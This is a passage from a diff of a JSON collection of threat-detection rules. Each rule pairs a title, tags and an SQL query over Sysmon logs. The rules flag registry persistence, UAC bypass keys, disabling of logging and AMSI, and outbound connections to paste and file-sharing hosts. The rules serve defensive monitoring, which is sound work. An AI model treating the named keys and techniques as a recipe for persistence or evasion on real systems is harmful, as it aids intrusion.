'\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", 